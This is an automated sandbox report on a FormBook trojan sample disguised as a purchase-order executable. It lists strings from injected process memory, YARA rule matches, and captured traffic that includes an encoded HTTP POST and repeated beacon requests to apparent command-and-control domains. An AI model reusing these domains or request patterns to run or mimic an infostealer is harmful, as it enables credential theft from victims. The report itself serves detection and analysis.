            Source: isoburn.exe, 00000005.00000002.4476014647.0000000006A6E000.00000004.10000000.00040000.00000000.sdmp, isoburn.exe, 00000005.00000002.4480922453.0000000007970000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4476014647.0000000006294000.00000004.10000000.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.0000000003974000.00000004.00000001.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.000000000414E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.369a663b08a55d305b97.js
            Source: isoburn.exe, 00000005.00000002.4476014647.0000000006A6E000.00000004.10000000.00040000.00000000.sdmp, isoburn.exe, 00000005.00000002.4480922453.0000000007970000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4476014647.0000000006294000.00000004.10000000.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.0000000003974000.00000004.00000001.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.000000000414E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/index.442d968fe56a55df4c76.css
            Source: isoburn.exe, 00000005.00000003.2317674797.000000000838A000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000003.2368356075.000000000844A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
            Source: isoburn.exe, 00000005.00000002.4474142632.00000000031C8000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4474142632.00000000031F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: isoburn.exe, 00000005.00000002.4474142632.00000000031F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: isoburn.exe, 00000005.00000002.4474142632.00000000031F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
            Source: isoburn.exe, 00000005.00000002.4474142632.00000000031C8000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4474142632.00000000031F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: isoburn.exe, 00000005.00000002.4474142632.00000000031F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: isoburn.exe, 00000005.00000002.4474142632.00000000031C8000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4474142632.00000000031F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: isoburn.exe, 00000005.00000002.4474142632.00000000031F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: isoburn.exe, 00000005.00000003.2312983823.0000000008283000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: isoburn.exe, 00000005.00000003.2317674797.000000000838A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mozilla.org0/
            Source: isoburn.exe, 00000005.00000002.4476014647.0000000006A6E000.00000004.10000000.00040000.00000000.sdmp, isoburn.exe, 00000005.00000002.4480922453.0000000007970000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4476014647.0000000006294000.00000004.10000000.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.0000000003974000.00000004.00000001.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.000000000414E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://pdds.quark.cn/download/stfile/rrxtuszryrsvrtzte/QuarkCloudDrive-v2.5.43-release-pckk
            Source: isoburn.exe, 00000005.00000002.4476014647.0000000005C4C000.00000004.10000000.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.000000000332C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://reg.ru?target=_blank
            Source: isoburn.exe, 00000005.00000002.4476014647.0000000006A6E000.00000004.10000000.00040000.00000000.sdmp, isoburn.exe, 00000005.00000002.4480922453.0000000007970000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4476014647.0000000006294000.00000004.10000000.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.0000000003974000.00000004.00000001.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.000000000414E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://track.uc.cn/collect
            Source: isoburn.exe, 00000005.00000003.2317674797.000000000838A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
            Source: isoburn.exe, 00000005.00000003.2315895532.00000000082AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: isoburn.exe, 00000005.00000003.2315895532.00000000082AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: isoburn.exe, 00000005.00000002.4476014647.0000000005C4C000.00000004.10000000.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.000000000332C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/dedicated/?utm_source=&utm_medium=expired&utm_campaign
            Source: AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.000000000332C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting
            Source: isoburn.exe, 00000005.00000002.4476014647.0000000005C4C000.00000004.10000000.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.000000000332C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting/
            Source: isoburn.exe, 00000005.00000002.4476014647.0000000005C4C000.00000004.10000000.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.000000000332C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting/?utm_source=&utm_medium=expired&utm_campaign
            Source: isoburn.exe, 00000005.00000002.4476014647.0000000005C4C000.00000004.10000000.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.000000000332C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/service/prolong_period_anonymous?servtype=srv_hosting_ispmgr&amp;dname_or_ip=
            Source: isoburn.exe, 00000005.00000002.4476014647.0000000005C4C000.00000004.10000000.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.000000000332C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/ssl-certificate/?utm_source=&utm_medium=expired&utm_campaign
            Source: isoburn.exe, 00000005.00000002.4476014647.0000000005C4C000.00000004.10000000.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.000000000332C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/vps/?utm_source=&utm_medium=expired&utm_campaign
            Source: isoburn.exe, 00000005.00000002.4476014647.0000000005C4C000.00000004.10000000.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.000000000332C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/vps/cloud/?utm_source=&utm_medium=expired&utm_campaign
            Source: isoburn.exe, 00000005.00000002.4476014647.0000000005C4C000.00000004.10000000.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.000000000332C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-tools/geoip?utm_source=&utm_medium=expired&utm_campaign
            Source: isoburn.exe, 00000005.00000002.4476014647.0000000005C4C000.00000004.10000000.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.000000000332C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-tools/myip?utm_source=&utm_medium=expired&utm_campaign
            Source: isoburn.exe, 00000005.00000002.4476014647.0000000005C4C000.00000004.10000000.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.000000000332C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-tools/port-checker?utm_source=&utm_medium=expired&utm_campaign
            Source: isoburn.exe, 00000005.00000002.4476014647.0000000005C4C000.00000004.10000000.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.000000000332C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/?utm_source=&utm_medium=expired&utm_campaign
            Source: isoburn.exe, 00000005.00000002.4476014647.0000000005C4C000.00000004.10000000.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.000000000332C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/check_site?utm_source=&utm_medium=expired&utm_campaign
            Source: unknownHTTP traffic detected: POST /ahec/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brHost: www.jones4deepriver.comOrigin: http://www.jones4deepriver.comReferer: http://www.jones4deepriver.com/ahec/Cache-Control: no-cacheContent-Length: 185Content-Type: application/x-www-form-urlencodedConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4Data Raw: 4b 48 63 48 3d 77 6d 65 50 2b 49 44 38 61 47 58 35 78 6e 56 35 62 44 41 66 37 78 49 7a 4f 75 45 69 33 76 68 55 44 54 68 4f 64 73 2b 45 43 52 39 30 69 48 6e 4d 4a 37 56 53 61 50 61 74 71 4b 54 34 55 54 6e 36 35 71 2f 6d 67 71 6e 69 69 63 78 37 50 73 76 74 44 45 5a 65 54 44 51 7a 74 52 35 57 54 6d 6f 4b 61 6d 67 6e 52 66 53 7a 54 34 64 53 33 77 33 64 39 4f 42 67 43 51 35 57 6b 77 75 73 51 79 43 74 31 64 70 6e 63 65 52 4a 73 55 36 43 6e 68 59 78 61 57 44 34 75 45 70 63 72 6f 39 47 64 66 49 79 6a 6b 4c 38 6f 42 31 70 33 44 6f 6e 48 43 78 44 43 77 3d 3d Data Ascii: KHcH=wmeP+ID8aGX5xnV5bDAf7xIzOuEi3vhUDThOds+ECR90iHnMJ7VSaPatqKT4UTn65q/mgqniicx7PsvtDEZeTDQztR5WTmoKamgnRfSzT4dS3w3d9OBgCQ5WkwusQyCt1dpnceRJsU6CnhYxaWD4uEpcro9GdfIyjkL8oB1p3DonHCxDCw==
            Source: unknownDNS traffic detected: queries for: www.alldaysslimmingstea.com
            Source: global trafficHTTP traffic detected: GET /ahec/?Vjk=-N-tntX&KHcH=0lWeLq0ljZnDSWqKPiItN+dDtGaop8tJSpt/SUCn4seLkPj1kpVBncTOO8qbY1skp8kxUg4twvHodh//BlyQvVPoMkTtjkNnJA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.alldaysslimmingstea.comConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /ahec/?KHcH=9k2v98v8fW7x5mtxcj8a5QMRCoEP1Px6NgJCH+u8B3tf6gDcFaFwcfLjsp7tbCeN6M+Gl5HR8oN4IorBb0piTBsblhtcQm5YDg==&Vjk=-N-tntX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.jones4deepriver.comConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /ahec/?Vjk=-N-tntX&KHcH=IVKkGpXtV1toVTOE4YlrK/DLoA9BOULGifHJVqVOgN7K+V/6a9WE/CA4RHgfE4yJ8GdRU2XQNCMfR2HSu9NM5VjrVHIYZDWS5A== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.poria.linkConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /ahec/?KHcH=MydpLo7WWyKQN3KSEM/46nakICary48nbscI2lMT8W/M5j1pmQABg8QwQndiOgkeUarM8fNOhSJ3XzKDSkOhi0uXSPTvTu0ZjA==&Vjk=-N-tntX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.makeinai.onlineConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /ahec/?Vjk=-N-tntX&KHcH=SEtDmKR01RO/v1cj8toEclhnh+z+cFCFQ+LqZaILuKhM8xDFx1nbKCOFshx5Sqoz6Az3phyVzpkjs7F2QS7dClw6x6iQ2E33Xw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.instantconvey.comConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /ahec/?KHcH=bB5JTYLqXbmN0Rh+5NINP+PQjDS0UbZCl3xm8ZfdPOYVrj3MpZEcwx/57KsfYAKqEjFN/H+DNeQWefm4mYcz+JEVJR030KrPkQ==&Vjk=-N-tntX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.domainappraisalbot.comConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /ahec/?Vjk=-N-tntX&KHcH=DTrGbTEHMG6Y4mKy1Dn1KlGSTxAaPAt5CR5S23I4xf5AWU1NMecScwq/Pr/mUgt4GFrPBjE4MJyXMuu59XRude7iecelPQFgCQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.nesmalt.infoConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /ahec/?KHcH=UYUxSke5jkUMcYDKg5c5qeCNAmjygCX5uaIG43dC5thZqMprvLUeD5Feo3aTVHSupyfrGHzleQTbxGW3puedJJLbH8mycsz0Gg==&Vjk=-N-tntX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.611erhm.topConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /ahec/?Vjk=-N-tntX&KHcH=pHT1kOem2IT0Y9TOyYUVH8n+JKlTpsv3XSVhoxxlik7UiuURsLT/Jzy3sp/tZoydu20sa6TfNH7nZl1KjnhVFUxaOpL3PpxqeQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.fam-scharf.netConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /ahec/?KHcH=AHFK2pjoxw5zzLKjgIeieoxyeFKGBXiFIXzrT8sRZEqLGYv6y8nhVjDsidhHFHxwb+HDFiGiPRNZnrHWQBMiJvE3/6rCIhWfjw==&Vjk=-N-tntX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.magmadokum.comConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /ahec/?Vjk=-N-tntX&KHcH=nB1qtJANgieev8TNIXcafe3NbPYBnXyCXRyPWsB/WMzSWoyZdSlu5bXncPzzIIBEZ/2nP35zxbYs3CtalsMWA76IWuP2FlzTnw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.thecoloringbitch.comConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /ahec/?KHcH=3lo42cEGi68x7KhRgTNiezz9KQRWhNcycY0hNiK/Qn4Z+z7fEU9kkqncAr7zuQTFBqkfWFiGtk2IJlit7AKsEfnRPtjbaXErcA==&Vjk=-N-tntX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.altralogos.comConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /ahec/?Vjk=-N-tntX&KHcH=W415zxONlMY0LROALmBwVywFRuOF9MDUrzPBSWER7JgIGEVSpL5hn1DTAqCrj0fiYOesE/vl81lAGPaeX7agy86ItGv6ERTYYg== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.77moea.topConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /ahec/?KHcH=5igDJT3zPYxoznSYBBpd18gTi2dx8KCRz+D9mmXj9CLVcvHmJGefSTTLw3ACEWBDJ4ZMU5QrLRnI3LOtkf+zzorQEnBYkPkOfg==&Vjk=-N-tntX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.wrautomotive.onlineConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 3.2.PO_CCTEB77.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.PO_CCTEB77.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2154955744.0000000001730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4474939191.0000000003400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4479415286.0000000004DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4475032057.0000000003470000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2154396659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4475055510.00000000036E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2155764463.0000000002560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 3.2.PO_CCTEB77.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 3.2.PO_CCTEB77.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.2154955744.0000000001730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4474939191.0000000003400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.4479415286.0000000004DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4475032057.0000000003470000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.2154396659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4475055510.00000000036E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.2155764463.0000000002560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: PO_CCTEB77.exe
            .NET source code contains very large array initializations
            Source: 0.2.PO_CCTEB77.exe.3221438.1.raw.unpack, -Module-.csLarge array initialization: _200F_206E_202A_202D_206F_206B_202A_202D_206D_200F_206F_200E_202A_200C_200C_206C_202D_206F_202E_206D_200E_206D_200E_200F_202B_202B_200F_200E_200C_206D_202A_202A_202D_200F_202E_202B_202C_202A_200C_200F_202E: array initializer size 2192
            Source: 0.2.PO_CCTEB77.exe.86f0000.10.raw.unpack, -Module-.csLarge array initialization: _200F_206E_202A_202D_206F_206B_202A_202D_206D_200F_206F_200E_202A_200C_200C_206C_202D_206F_202E_206D_200E_206D_200E_200F_202B_202B_200F_200E_200C_206D_202A_202A_202D_200F_202E_202B_202C_202A_200C_200F_202E: array initializer size 2192
            Source: PO_CCTEB77.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 3.2.PO_CCTEB77.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 3.2.PO_CCTEB77.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.2154955744.0000000001730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.4474939191.0000000003400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.4479415286.0000000004DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.4475032057.0000000003470000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.2154396659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
